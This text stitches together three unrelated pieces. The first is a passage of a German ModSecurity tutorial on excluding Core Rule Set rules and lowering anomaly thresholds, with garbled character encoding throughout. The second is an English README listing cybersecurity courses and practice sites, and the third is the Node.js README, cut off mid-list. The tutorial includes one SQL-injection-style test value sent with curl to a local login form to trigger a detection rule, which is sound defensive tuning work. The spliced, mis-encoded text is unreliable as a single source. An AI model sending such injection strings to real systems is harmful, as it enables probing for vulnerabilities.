zusammenarbeiten und falsche Alarme in allen mรถglichen Situationen auslรถsen. Deshalb gibt es also durchaus Anwendungsfรคlle fรผr das vollstรคndige Deaktivieren einer Regel. Ein nennenswertes Beispiel ist Regel mit der ID `920300`: *Request Missing an Accept Heder*. Es gibt einfach sehr viele User-Agents, die Request ohne *Accept-Header* รผbermitteln, weshalb es eigens eine eigene Regel fรผr dieses Problem gibt. Erhรถhen wir den Paranoia Level mal auf 2 indem wir den Wert `tx.paranoia_level` in er Regel 900'000 auf 2 setzen. Dann senden wir eine Anfrage ohne *Accept-Header* und lรถsen damit einen Alarm aus (Ich empfehle, den Paranoia Level danach wieder auf 1 zurรผckzudrehen): ```bash $> curl -v -H "Accept;" http://localhost/index.html ... > GET /index.html HTTP/1.1 > User-Agent: curl/7.47.0 > Host: localhost > Accept: ... $> tail /apache/logs/error.log | melidmsg 920300 Request Missing an Accept Header ``` Die Regel wurde also wie gewรผnscht ausgelรถst. Nun wollen wir diese Regel gezielt ausschliessen. Wir haben mehrere Optionen und starten mit der einfachsten: Wir schliessen die Regel zur Startzeit von Apache aus. Das bedeutet, dass wir die Regel aus dem Satz der geladenen Regel entfernen und damit sicher stellen, dass nach dem Start keine Prozessorzyklen mehr auf die Regel verschwendet werden. Natรผrlich kรถnnen wir nur Dinge entfernen, die vorher geladen wurden. Diese Anweisung muss also nach der CRS-Include-Direktive platziert werden. Im Konfigurations-Block, den wir vorher in dieser Anleitung beschrieben haben, war ein Platz fรผr diese Art von Auschluss-Anweisungen reserviert. Wir fรผllen unsere Direktive an dieser Stelle ein: ```bash # === ModSec Core Rule Set: Startup Time Rules Exclusions (no ids) # ModSec Exclusion Rule: 920300 Request Missing an Accept Header SecRuleRemoveById 920300 ``` Die Anweisung steht gemeinsam mit einem Kommentar, der beschreibt, was wir รผberhaupt ausschliessen. Es ist generell eine gute Praxis, das so zu handhaben. Wir haben die Option, Regeln mittels einer ID zu bezeichnen (das haben wir eben gemacht), mehrere Regeln durch ein Komma getrennt aufzulisten, einen ID Bereich zu bezeichnen oder aber wir kรถnnen Regeln durch ihre Tags bezeichnen. Hier ist ein Beispiel, das die Regel durch einen ihrer Tags ausschliesst: ```bash # ModSec Exclusion Rule: 920300 Request Missing an Accept Header SecRuleRemoveByTag "MISSING_HEADER_ACCEPT$" ``` Wie wir sehen, akzeptiert diese Richtlinie regulรคre Ausdrรผcke als Parameter. Leider ist die Unterstรผtzung nicht universell: Zum Beispiel ist die mit einem Pipe-Zeichen ausgedrรผckte *OR* Funktionalitรคt nicht implementiert. In der Praxis muss man ausprobieren und sehen, was funktioniert und was nicht. Technisch gibt es eine zusรคtzliche Richtlinie, `SecRuleRemoveByMsg`. Allerdings sind die Meldungen nicht garantiert stabil zwischen Releases und sie sind ohnehin nicht sehr konsistent. Daher sollten wir nicht versuchen, Regel Ausschlรผsse fรผr das CRS รผber dieses Statement zu konstruieren. Das sind also die *Rule Exclusions* zur Startzeit. Regeln so zu umgehen ist einfach und lesbar, aber es ist auch ein drastischer Schritt, den wir in einem Produktions-Setup nicht sehr oft verwenden kรถnnen. Denn wenn unsere Probleme mit der Regel 920300 auf einen einzigen legitimen Uptime-Agent beschrรคnkt sind, der lediglich die Verfรผgbarkeit unseres Services รผberprรผft, indem er die Indexseite anfordert, kรถnnen wir das Ausschalten der Regel diesen individuellen Request beschrรคnken. Dies ist nicht mehr ein Regel Ausschluss zur Startzeit, sondern neu zur Laufzeit (*Runtime*). Wir wenden ihn so an, dass er mit einer bestimmten Bedingung verknรผpft wird. Runtime Ausschlรผsse nutzen die *SecRule* Direktive kombiniert mit einer speziellen Aktion, die den Regelausschluss ausfรผhrt. Dies muss zur Laufzeit vor dem Ausfรผhren der betreffenden, alarmierenden Regel geschehen. Aus diesem Grund mรผssen Runtime-Regelausschlรผsse vor der CRS-Include-Anweisung platziert werden. Auch hierfรผr haben wir im Regelblock einen Bereich reserviert: ```bash # === ModSec Core Rule Set: Runtime Exclusion Rules (ids: 10000-49999) # ModSec Exclusion Rule: 920300 Request Missing an Accept Header SecRule REQUEST_FILENAME "@streq /index.html" \ "phase:1,nolog,pass,id:10000,ctl:ruleRemoveById=920300" ``` Das ist jetzt schwerer zu lesen. Besonders zu beachten ist das *ctl*-Statement: `ctl:ruleRemoveById=920300`. Dies ist die Steueraktion, die fรผr Laufzeitรคnderungen der Konfiguration der ModSecurity-Regel-Engine verwendet wird. Wir verwenden *ruleRemoveById* als Steueranweisung und wenden diese auf die Regel ID 920300 an. Dieser Block wird innerhalb einer standardmรคssigen *SecRule* -Richtlinie platziert. Dies ermรถglicht es uns, die volle Leistung von *SecRule* zu verwenden, um Regel 920300 in sehr spezifischen Situationen auszuschliessen. Hier schliessen wir es abhรคngig vom Pfad der Anforderung aus. Aber wir kรถnnten es auch abhรคngig von der IP-Adresse des Agenten anwenden - oder eine Kombination der beiden in einer verketteten Befehlsfolge. Wie bei den Ausschlรผssen zur Startzeit sind wir nicht auf einen Ausschluss durch die Regel ID Nummer beschrรคnkt. Ausschlรผsse via Tags funktionieren ebenso (`ctl: ruleRemoveByTag`). Auch hier werden regulรคre Ausdrรผcke unterstรผtzt, aber nur bis zu einem gewissen Grad. Startzeit Ausschlรผsse von Regeln sowie Laufzeit Ausschlรผsse haben dieselbe Wirkung. Intern aber sind sie fundamental unterschiedlich. Mit den Runtime-Ausschlรผssen erhalten wir granulare Kontrolle auf Kosten der Leistung, da der Ausschluss fรผr jede einzelne Anfrage neu ausgewertet wird. Startup Time Rule Exclusions sind performanter, und sie sind auch einfacher zu lesen und zu schreiben. ### Schritt 8: Behandlung von False Positives: Einzelne Regeln fรผr bestimmte Parameter ausschalten Als nรคchstes versuchen wir zu verhindern, dass eine Regel einen ganz bestimmten Parameter รผberprรผft. Im Gegensatz zu unserem Beispiel 920300, das auf den spezifischen Accept-Header schaute, zielen wir nun auf Regeln, welche die ARGS-Variablengruppe untersuchen. Nehmen wir an, wir haben ein Passwort-Feld in einem Authentifizierungsschema wie in der vorangegangenen Anleitung verwendet. Benutzern wird empfohlen, schwer zu erraten Passwรถrter mit vielen Sonderzeichen zu verwenden. Das Core Rule Set sendet darauf einen steten Strom von Warnungen aufgrund der seltsamen Muster in diesem Parameter-Feld. Hier ist ein kรผnstliches Beispiel, das die Regel 942100 auslรถst, welche die Bibliothek libinjection nutzt, um SQL-Injektionen zu erkennen. Das Ausfรผhren des folgenden Kommandos fรผhrt zu einem Alarm: ```bash $> curl --data "password=' or f7x=gZs" localhost/login/login.do ``` Aus Sicherheitsperspektive ist mit diesem Passwort nichts Falsches dran. Tatsรคchlich sollten wir diese Regel einfach ausschalten. Aber natรผrlich wรคre es ein Fehler, die Regel komplett auszuschalten, denn bei anderen Parametern als dem Kennwort macht die Regel sehr wohl Sinn. Idealerweise schliessen wir also nur den Parameter *password* von der Untersuchung durch diese Regel aus. Hier ist die Startzeit Direktive um diesen Parameter von der Regel 942100 zu verbergen: ```bash # ModSec Exclusion Rule: 942100 SQL Injection Attack Detected via libinjection SecRuleUpdateTargetById 942100 !ARGS:password ``` Diese Direktive addiert *nicht ARGS:password" zur Liste der Parameter fรผr Regel 942100. Die schliesst den Passwort Parameter damit effektiv von der Regel aus. Die Direktive akzeptiert natรผrlich auch Regel-Bereiche als Parameter. Und natรผrlich existiert sie auch in einer Variante in der wir die Regel รผber ihre Tags definieren kรถnnen: ```bash # ModSec Exclusion Rule: 942100 SQL Injection Attack Detected via libinjection SecRuleUpdateTargetByTag "attack-sqli" !ARGS:password ``` Das in diesem Beispiel verwendete Tag *attack-sqli* weist auf eine breite Palette von SQL-Injection-Regeln hin. So wird das Statement verhindern, dass eine ganze Klasse von Regeln den Passwort Parameter ignoriert. Dies ist fรผr diesen Kennwortparameter sinnvoll, kann aber fรผr andere Parameter zu weit gehen. Es hรคngt also wirklich von der Anwendung und dem betreffenden Parameter ab. Ein Passwortparameter wird grundsรคtzlich nur bei der Login-Anforderung und der Registrierung verwendet, so dass wir mit der `SecRuleUpdateTargetById`-Direktive in der Praxis arbeiten kรถnnen, damit alle Vorkommen des Parameters von der Regel 942100 befreit werden. Aber es gilt doch zu beachten, dass die Richtlinie serverweit wirkt. Wenn der Server also mehrere Dienste mit mehreren virtuellen Apache-Hosts beherbergt, die jeweils eine andere Anwendung ausfรผhren, dann deaktivieren die beiden Befehle `SecRuleUpdateTargetById` und` SecRuleUpdateTargetByTag` diese Regeln fรผr sรคmtliche Applikationen in deren Requests ein Parameter mit Namen *password* vorkommt. Nehmen wir also an, dass wir *password* nur unter bestimmten Bedingungen ausschliessen mรถchten: Beispielsweise sollte die Regel immer dann aktiv bleiben, wenn ein Security Scanner die Anfrage รผbermittelt. Ein ziemlich guter Weg, um Scanner zu erkennen ist es, auf den *Referer-Header* zu achten. Wir kรถnnen es so halten, dass wir den Header รผberprรผfen und wenn er unserer Erwartung entspricht, dann deaktivieren wir die รœberprรผfung des Parameters *password* zur Laufzeit durch die Regel 942100. Dieser Runtime-Regelausschluss funktioniert erneut mit einer Control-Action; รคhnlich wie wir es oben gesehen haben: ```bash SecRule REQUEST_HEADERS:Referer "@streq http://localhost/login/displayLogin.do" \ "phase:1,nolog,pass,id:10000,ctl:ruleRemoveTargetById=942100;ARGS:password" ``` Das Format der Steuer-Aktion ist wirklich schwer zu begreifen: Zusรคtzlich zur Regel ID fรผgen wir einen Strichpunkt und dann den Passwort-Parameter als Teil der ARGS-Gruppe von Variablen hinzu. In ModSecurity wird dies als ARGS-Auflistung mit dem Doppelpunkt als Trennzeichen bezeichnet. Nicht ganz leicht, aber wir mรผssen versuchen, uns das zu merken! Im professionellen Einsatz ist dies wahrscheinlich dasjenige Rule Exclusion Konstrukt, das am meisten verwendet wird (nicht jedoch mit dem Referer-Header, sondern mit der Variable *REQUEST_FILENAME*). Diese ganze Direktive ist auf der Parameterebene sehr granular und kann aufgrund der Flexibilitรคt *SecRule* so konstruiert werden, dass es nur minimale Auswirkungen auf die legitimen Requests hat. Wenn wir lieber mit einem Tag als mit einer ID arbeiten mรถchten, dann geht das wie folgt: ```bash SecRule REQUEST_HEADERS:Referer "@streq http://localhost/login/displayLogin.do" \ "phase:1,nolog,pass,id:10000,ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:password" ``` Dieser Abschnitt war sehr wichtig. Daher noch einmal zusammenfassen: Wir definieren eine Regel, um eine andere Regel zu unterdrรผcken. Wir verwenden dafรผr ein Regel-Muster, das es uns erlaubt, einen Pfad als Bedingung definieren zu kรถnnen. Dies ermรถglicht es uns, Regeln fรผr einzelne Teile einer Anwendung zu deaktivieren, aber nur an Stellen, an denen Fehlalarme auftreten. Und gleichzeitig bewahrt es uns davor, Regeln auf dem gesamten Server zu deaktivieren. Damit haben wir alle vier grundlegenden Methoden gesehen, um falsche Alarme รผber Regelausschlรผsse zu behandeln. Damit ist der Werkzeugkasten beisammen, um alle Fehlalarme nacheinander abzuarbeiten. ### Schritt 9: Die Anomalie-Limite nachjustieren Die Behandlung von falschen Positiven ist manchmal mรผhsam. Doch wenn man das Ziel verfolgt, Applikationen wirklich zu schรผtzen, dann lohnt es sich gewiss. Als wir das Statistik-Skript einfรผhrten, haben wir festgelegt, dass mindestens 99,99% der Anfragen das Regelwerk ohne False Positives passieren kรถnnen sollten. Die verbleibenden Alarme, wohl in der Mehrzahl von Angreifern verursachte Anfragen, sollten blockiert werden. Aber wir laufen immer noch mit einer Anomalie Limite von 10'000. Wir mรผssen das auf ein vernรผnftiges Niveau reduzieren. Mit einer Grenze, die hรถher als 30 oder 40 liegt, ist es unwahrscheinlich, etwas ernsthaft stoppen zu kรถnnen. Mit einem Schwellenwert von 20 sehen wir einen ersten Effekt und bei einer Limite von 10 erhalten wir einen ziemlich guten Schutz vor Standard-Angreifern. Selbst wenn eine einzelne Regel nur 5 Punkte erzielt, verursachen einige Angriffsklassen wie etwa SQL-Injections meistens mehrere Alarme, so dass eine Grenze von 10 schon recht viele Angreifer abwehrt. In anderen Kategorien ist die Abdeckung mit Regeln weniger umfangreich. Das bedeutet, dass die Akkumulation mehrerer Regeln weniger stark wirkt. So ist es perfekt mรถglich, mit einem bestimmten Angriff unter 10 zu bleiben. Deshalb gibt erst eine Limite von 5 fรผr eingehende Requests und 4 fรผr abgehende Responses einen wirklich guten Schutz. Dies entspricht den Default Werten des CRS. Aber wie kรถnnen wir die Grenze von 10'000 bis 5 senken, ohne die Produktion zu beeintrรคchtigen? Es braucht ein gewisses Vertrauen in die eigenen Tuning Fรคhigkeiten um diesen grossen Schritte zu schaffen. Besser ist es รผber mehrere Iterationen zu gehen: Eine erste Tuning-Runde wird mit einer Grenze von 1'000 durchgefรผhrt. Wenn die eklatantesten Quellen von False Positives auf diese Weise eliminiert wurden, dann warten wir eine vorgegebene Zeitspanne und verringern dann die Grenze auf 50 und untersuchen die Protokolle erneut. Wir tunen und reduzieren spรคter auf 30, dann 20, 10 und schliesslich 5. Nach jeder Reduktion muss man die neuen Log-Files รผberprรผfen und das Statistik-Skript erneut ausfรผhren. Ein Blick auf die Statistik erlaubt eine Aussage, was wir von einer Reduktion der Limiten erwarten kรถnnen. Schauen wir uns die Statistik von vorher also nochmals genauer an: ```bash INCOMING Num of req. | % of req. | Sum of % | Missing % Number of incoming req. (total) | 10000 | 100.0000% | 100.0000% | 0.0000% Empty or miss. incoming score | 41 | 0.4100% | 0.4100% | 99.5900% Reqs with incoming score of 0 | 9920 | 99.2000% | 99.6100% | 0.3900% Reqs with incoming score of 1 | 0 | 0.0000% | 99.6100% | 0.3900% Reqs with incoming score of 2 | 11 | 0.1100% | 99.7200% | 0.2800% Reqs with incoming score of 3 | 17 | 0.1699% | 99.8900% | 0.1100% Reqs with incoming score of 4 | 0 | 0.0000% | 99.8900% | 0.1100% Reqs with incoming score of 5 | 8 | 0.0800% | 99.9700% | 0.0300% Reqs with incoming score of 6 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 7 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 8 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 9 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 10 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 11 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 12 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 13 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 14 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 15 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 16 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 17 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 18 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 19 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 20 | 0 | 0.0000% | 99.9700% | 0.0300% Reqs with incoming score of 21 | 1 | 0.0100% | 99.9800% | 0.0200% Reqs with incoming score of 22 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 23 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 24 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 25 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 26 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 27 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 28 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 29 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 30 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 31 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 32 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 33 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 34 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 35 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 36 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 37 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 38 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 39 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 40 | 0 | 0.0000% | 99.9800% | 0.0200% Reqs with incoming score of 41 | 2 | 0.0200% | 100.0000% | 0.0000% ``` 10'000 Anfragen sind nicht wirklich ein grosses Logfile, aber es wird fรผr unsere Zwecke reichen. Basierend auf den Daten kรถnnen wir sofort entscheiden die Anomalie Limite auf 50 zu reduzieren. Es ist unwahrscheinlich, dass ein Request diese Limite erreicht. Und wenn er die Limite erreicht, dann dรผrfte es sich um einen sehr seltenen Fall handeln, der sehr rar ist und in der Produktion kaum eine massive Beeintrรคchtigung des Betriebes nach sich zieht. Die Verringerung der Limite auf 30 wรคre wahrscheinlich ein wenig รผbereifrig, da die Spalte auf der rechten Seite anzeigt, dass 0,02% der Anfragen mehr als 30 Punkte erzielten. Wir sollten die False Positives bei 41 behandeln, bevor wir die Grenze auf 30 reduzieren. Mit diesen statistischen Daten zeichnet sich der Tuning-Prozess ab: Das iterative Behandeln von einzelnen Fehlalarmen mit Hilfe des *modsec-positive-stats.rb*-Skripts bringt Ordnung und Berechenbarkeit in den Tuning Prozess. Fรผr die ausgehenden Antworten ist die Situation ein bisschen einfacher, da wir kaum Werte hรถher als 5 sehen werden. Es gibt einfach nicht genug Regeln, um eine kumulative Wirkung zu haben. Wahrscheinlich weil es nicht viel gibt, was man an einer Antwort รผberprรผfen kรถnnte. Deshalb reduziere ich den Outgoing Anomaly Score jeweils rasch auf 5 oder 4 (was aus den Default Wert des CRS darstellt). Ich denke, das Tuning-Konzept und die Theorie sind jetzt ganz klar. In der nรคchsten Anleitung werden wir mit Tuning der False Positives fortfahren und uns etwas Praxis mit den hier demonstrierten Techniken erarbeiten. Und ich werde auch ein Skript vorstellen, das dabei hilft, die komplizierteren Regel Ausschlรผsse zu konstruieren. ### Schritt 10 (Goodie): Zusammenfassung der Wege zur Bekรคmpfung von Falschpositionen Es ist vielleicht am besten, die Rule Exclusion Direktiven in einer Grafik zusammenzufassen: Hier ein Cheatsheet fรผr den freien Gebrauch! <a href="https://www.netnea.com/cms/rule-exclusion-cheatsheet-download/"><img src="https://www.netnea.com/files/tutorial-7-rule-exclusion-cheatsheet_small.png" alt="Rule Exclusion CheatSheet" width="476" height="673" /></a> ### Verweise - [Spider Labs Blog Post: Exception Handling](http://blog.spiderlabs.com/2011/08/modsecurity-advanced-topic-of-the-week-exception-handling.html) - [ModSecurity Referenzhandbuch](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual) ### Lizenz / Kopieren / Weiterverwenden <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-nc-sa/4.0/80x15.png" /></a><br />Diese Arbeit ist wie folgt lizenziert / This work is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/">Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License</a>.
# Cyber Security Community DSC - DYPCOE Hello security researchers this repository is built in a way which guides you through the initial learning and basics of Cyber Security in web application ### Note Before we Dig in: ** Information provided on here is for educational purposes only. The communtiy is no way responsible for any misuse of the information..** ----------------------------------------------------------------------- What is Cyber Security in Web Applications ? Web application security is the process of protecting websites and online services against different security threats that exploit vulnerabilities in an applicationโ€™s code. So now you might have also got a question like what is vulnerabilities and what are the types of vulnerabilities? Vulnerability is a weakness which can be exploited by a threat actor, such as an attacker, to perform unauthorized actions within a computer system. There is a global community of Web app security **OWASP - "The Open Web Application Security Project"** which looks on upon the top vulnerabilities and release them according to their severity the top 10 **OWASP** vulnerabilities in 2020 are 1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring ----------------------------------------------------------------------- ### Courses #### 1. Basic Courses for getting firm knowledge 1. [Bug Bounty Hunting - Offensive Approach to Hunt Bugs](https://www.udemy.com/course/bug-bounty-hunting-offensive-approach-to-hunt-bugs/) 2. [Pentester Lab](https://pentesterlab.com/pro) 3. [Portswigger WebSecurity Academy](https://portswigger.net/web-security) #### 2. Advanced courses for mastering the domain 1. [OSCP](https://www.offensive-security.com/pre-reg/) 2. [Certified Ethical Hacker](https://www.eccouncil.org/contact-form-international/) 3. [Advanced Penetration Tester](https://www.offensive-security.com/pre-reg/) And many more from [Offensive-Security](https://www.offensive-security.com/courses-and-certifications/) ----------------------------------------------------------------------- ### Bug-Bounty Hunting Bug bounty hunters are ethical hackers who make a hobby (or, even a business) of finding security issues or bugs in an online businesses. Rather than misuse it, these hackers, in a responsible manner, disclose it to the firm. Many websites offer a **Bug Bounty Program:** A bug bounty program is a deal offered by many websites, organizations and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to security exploits and vulnerabilities. ----------------------------------------------------------------------- ### Catch The Flag (CTF) A capture the flag (CTF) contest is a special kind of cybersecurity competition designed to challenge its participants to solve computer security problems and/or capture and defend computer systems. Typically, these competitions are team-based and attract a diverse range of participants, including students, enthusiasts and professionals. A CTF competition may take a few short hours, an entire day or even multiple days. CTF competitions have elevated from their humble roots to reach sport-level status, with thousands of individual games and leagues now taking place every year across the globe โ€” including the annual DEF CON competition, one of the most prestigious CTF events in the world. ----------------------------------------------------------------------- ### Websites To Practice #### 1. Make a hands on practice over major vulnerabilities 1. [Accunetix](http://testphp.vulnweb.com/) 2. [HackThisSite](https://www.hackthissite.org/) #### 2. Advance in Penetration Testing 1. [HackTheBox](https://www.hackthebox.eu/login) 2. [Pentester Labs](https://pentesterlab.com/) #### 3. Bug Bounty Communities 1. [Hackerone](https://www.hackerone.com/) 2. [BugCrowd](https://www.bugcrowd.com/login/) 3. [Open Bug Bounty](https://www.openbugbounty.org/) #### 4. Capture The Flag (CTF) 1. [Hacker101](https://ctf.hacker101.com/) 2. [CTFtime](https://ctftime.org/) ----------------------------------------------------------------------- ### Tools **One of the most important tool in Cyber Security is Burpsuite Read more about Burpsuite [Here](https://www.geeksforgeeks.org/what-is-burp-suite/) And you can download it from [Here](https://portswigger.net/burp/communitydownload)** Apart from this reading and gain the best knowledge is the important tool to succeed in Ethical Hacking **You can use the following as a tool to learn most of the new things and be a finest Security Researcher** 1. [Medium](https://medium.com/bugbountywriteup/tagged/ethical-hacking) 2. [GeekforGeeks](https://www.geeksforgeeks.org/tag/cyber-security/) 3. [Hacktivity](https://hackerone.com/hacktivity) 4. [CrowdStream](https://bugcrowd.com/crowdstream) All the Writeup's present here help you all to develope your skills and learn new intresting methods
# Node.js Node.js is an open-source, cross-platform JavaScript runtime environment. For information on using Node.js, see the [Node.js website][]. The Node.js project uses an [open governance model](./GOVERNANCE.md). The [OpenJS Foundation][] provides support for the project. Contributors are expected to act in a collaborative manner to move the project forward. We encourage the constructive exchange of contrary opinions and compromise. The [TSC](./GOVERNANCE.md#technical-steering-committee) reserves the right to limit or block contributors who repeatedly act in ways that discourage, exhaust, or otherwise negatively affect other participants. **This project has a [Code of Conduct][].** ## Table of contents * [Support](#support) * [Release types](#release-types) * [Download](#download) * [Current and LTS releases](#current-and-lts-releases) * [Nightly releases](#nightly-releases) * [API documentation](#api-documentation) * [Verifying binaries](#verifying-binaries) * [Building Node.js](#building-nodejs) * [Security](#security) * [Contributing to Node.js](#contributing-to-nodejs) * [Current project team members](#current-project-team-members) * [TSC (Technical Steering Committee)](#tsc-technical-steering-committee) * [Collaborators](#collaborators) * [Triagers](#triagers) * [Release keys](#release-keys) * [License](#license) ## Support Looking for help? Check out the [instructions for getting support](.github/SUPPORT.md). ## Release types * **Current**: Under active development. Code for the Current release is in the branch for its major version number (for example, [v15.x](https://github.com/nodejs/node/tree/v15.x)). Node.js releases a new major version every 6 months, allowing for breaking changes. This happens in April and October every year. Releases appearing each October have a support life of 8 months. Releases appearing each April convert to LTS (see below) each October. * **LTS**: Releases that receive Long Term Support, with a focus on stability and security. Every even-numbered major version will become an LTS release. LTS releases receive 12 months of _Active LTS_ support and a further 18 months of _Maintenance_. LTS release lines have alphabetically-ordered code names, beginning with v4 Argon. There are no breaking changes or feature additions, except in some special circumstances. * **Nightly**: Code from the Current branch built every 24-hours when there are changes. Use with caution. Current and LTS releases follow [semantic versioning](https://semver.org). A member of the Release Team [signs](#release-keys) each Current and LTS release. For more information, see the [Release README](https://github.com/nodejs/Release#readme). ### Download Binaries, installers, and source tarballs are available at <https://nodejs.org/en/download/>. #### Current and LTS releases <https://nodejs.org/download/release/> The [latest](https://nodejs.org/download/release/latest/) directory is an alias for the latest Current release. The latest-_codename_ directory is an alias for the latest release from an LTS line. For example, the [latest-fermium](https://nodejs.org/download/release/latest-fermium/) directory contains the latest Fermium (Node.js 14) release. #### Nightly releases <https://nodejs.org/download/nightly/> Each directory name and filename contains a date (in UTC) and the commit SHA at the HEAD of the release. #### API documentation Documentation for the latest Current release is at <https://nodejs.org/api/>. Version-specific documentation is available in each release directory in the _docs_ subdirectory. Version-specific documentation is also at <https://nodejs.org/download/docs/>. ### Verifying binaries Download directories contain a `SHASUMS256.txt` file with SHA checksums for the files. To download `SHASUMS256.txt` using `curl`: ```console $ curl -O https://nodejs.org/dist/vx.y.z/SHASUMS256.txt ``` To check that a downloaded file matches the checksum, run it through `sha256sum` with a command such as: ```console $ grep node-vx.y.z.tar.gz SHASUMS256.txt | sha256sum -c - ``` For Current and LTS, the GPG detached signature of `SHASUMS256.txt` is in `SHASUMS256.txt.sig`. You can use it with `gpg` to verify the integrity of `SHASUMS256.txt`. You will first need to import [the GPG keys of individuals authorized to create releases](#release-keys). To import the keys: ```console $ gpg --keyserver hkps://keys.openpgp.org --recv-keys 4ED778F539E3634C779C87C6D7062848A1AB005C ``` See [Release keys](#release-keys) for a script to import active release keys. Next, download the `SHASUMS256.txt.sig` for the release: ```console $ curl -O https://nodejs.org/dist/vx.y.z/SHASUMS256.txt.sig ``` Then use `gpg --verify SHASUMS256.txt.sig SHASUMS256.txt` to verify the file's signature. ## Building Node.js See [BUILDING.md](BUILDING.md) for instructions on how to build Node.js from source and a list of supported platforms. ## Security For information on reporting security vulnerabilities in Node.js, see [SECURITY.md](./SECURITY.md). ## Contributing to Node.js * [Contributing to the project][] * [Working Groups][] * [Strategic initiatives][] * [Technical values and prioritization][] ## Current project team members For information about the governance of the Node.js project, see [GOVERNANCE.md](./GOVERNANCE.md). <!-- node-core-utils and find-inactive-tsc.mjs depend on the format of the TSC list. If the format changes, those utilities need to be tested and updated. --> ### TSC (Technical Steering Committee) #### TSC voting members <!--lint disable prohibited-strings--> * [aduh95](https://github.com/aduh95) - **Antoine du Hamel** <<[email protected]>> (he/him) * [apapirovski](https://github.com/apapirovski) - **Anatoli Papirovski** <<[email protected]>> (he/him) * [BethGriggs](https://github.com/BethGriggs) - **Beth Griggs** <<[email protected]>> (she/her) * [BridgeAR](https://github.com/BridgeAR) - **Ruben Bridgewater** <<[email protected]>> (he/him) * [ChALkeR](https://github.com/ChALkeR) - **ะกะบะพะฒะพั€ะพะดะฐ ะะธะบะธั‚ะฐ ะะฝะดั€ะตะตะฒะธั‡** <<[email protected]>> (he/him) * [cjihrig](https://github.com/cjihrig) - **Colin Ihrig** <<[email protected]>> (he/him) * [danielleadams](https://github.com/danielleadams) - **Danielle Adams** <<[email protected]>> (she/her) * [fhinkel](https://github.com/fhinkel) - **Franziska Hinkelmann** <<[email protected]>> (she/her) * [GeoffreyBooth](https://github.com/geoffreybooth) - **Geoffrey Booth** <<[email protected]>> (he/him) * [gireeshpunathil](https://github.com/gireeshpunathil) - **Gireesh Punathil** <<[email protected]>> (he/him) * [jasnell](https://github.com/jasnell) - **James M Snell** <<[email protected]>> (he/him) * [joyeecheung](https://github.com/joyeecheung) - **Joyee Cheung** <<[email protected]>> (she/her) * [legendecas](https://github.com/legendecas) - **Chengzhong Wu** <<[email protected]>> (he/him) * [mcollina](https://github.com/mcollina) - **Matteo Collina** <<[email protected]>> (he/him) * [mhdawson](https://github.com/mhdawson) - **Michael Dawson** <<[email protected]>> (he/him) * [RafaelGSS](https://github.com/RafaelGSS) - **Rafael Gonzaga** <<[email protected]>> (he/him) * [RaisinTen](https://github.com/RaisinTen) - **Darshan Sen** <<[email protected]>> (he/him) * [richardlau](https://github.com/richardlau) - **Richard Lau** <<[email protected]>> * [ronag](https://github.com/ronag) - **Robert Nagy** <<[email protected]>> * [targos](https://github.com/targos) - **Michaรซl Zasso** <<[email protected]>> (he/him) * [tniessen](https://github.com/tniessen) - **Tobias NieรŸen** <<[email protected]>> (he/him) * [Trott](https://github.com/Trott) - **Rich Trott** <<[email protected]>> (he/him) #### TSC regular members * [addaleax](https://github.com/addaleax) - **Anna Henningsen** <<[email protected]>> (she/her) * [bnoordhuis](https://github.com/bnoordhuis) - **Ben Noordhuis** <<[email protected]>> * [codebytere](https://github.com/codebytere) - **Shelley Vohr** <<[email protected]>> (she/her) * [danbev](https://github.com/danbev) - **Daniel Bevenius** <<[email protected]>> (he/him) * [gabrielschulhof](https://github.com/gabrielschulhof) - **Gabriel Schulhof** <<[email protected]>> * [mscdex](https://github.com/mscdex) - **Brian White** <<[email protected]>> * [MylesBorins](https://github.com/MylesBorins) - **Myles Borins** <<[email protected]>> (he/him) * [rvagg](https://github.com/rvagg) - **Rod Vagg** <<[email protected]>> * 